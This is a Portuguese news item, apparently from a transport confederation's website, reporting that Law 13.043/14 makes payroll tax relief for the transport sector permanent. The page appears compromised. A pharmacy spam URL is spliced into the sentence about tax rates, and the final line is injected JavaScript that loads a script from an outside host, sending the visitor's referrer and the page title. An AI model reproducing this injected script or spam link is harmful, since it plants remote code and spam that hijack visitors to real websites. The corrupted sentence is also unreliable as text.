Desoneração da folha para o setor de

unnamed

Com ampla participação da CNT (Confederação Nacional do Transporte), o governo federal publicou, em novembro do ano passado, a Lei 13.043/14, que prevê a desoneração permanente da folha de pagamento dos empregados, trabalhadores avulsos e contribuintes individuais do setor de transporte.

A alíquota http://viagradiscountstore.com/ é a mesma da que já estava em vigor: 1% ou 2% do valor total da receita da empresa, conforme o caso.

A novidade é que a desoneração passa a ser definitiva, diferentemente da regra anterior, que previa o benefício somente até o dia 31 de dezembro de 2014.

Segundo dados da Receita Federal, com a desoneração de 1% e 2%, houve uma economia de R$ 2,4 bilhões, de 2012 a maio de 2014. As informações compreendem transporte terrestre, aquaviário, aéreo, além do armazenamento e atividades auxiliares dos transportes. Os modais rodoviário e ferroviário foram os que mais economizaram.

Além da lei que prevê a desoneração da folha de pagamento, a CNT também tem colaborado com debates de suma importância para a sociedade, como a Lei da Mobilidade Urbana e a Lei dos  portos.

Para conferir a reportagem completa que detalha a Lei 13.043/14, traz o ponto de vista de empresários do setor, os avanços e a participação da CNT em conselhos, câmaras e grupos de trabalho,  basta acessar a edição completa da última edição da revista CNT Transporte Atual.

Para ler, acesse o link http://www.cnt.org.br/Paginas/Revista-CNT-Transporte-Atual.aspx?r=144

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;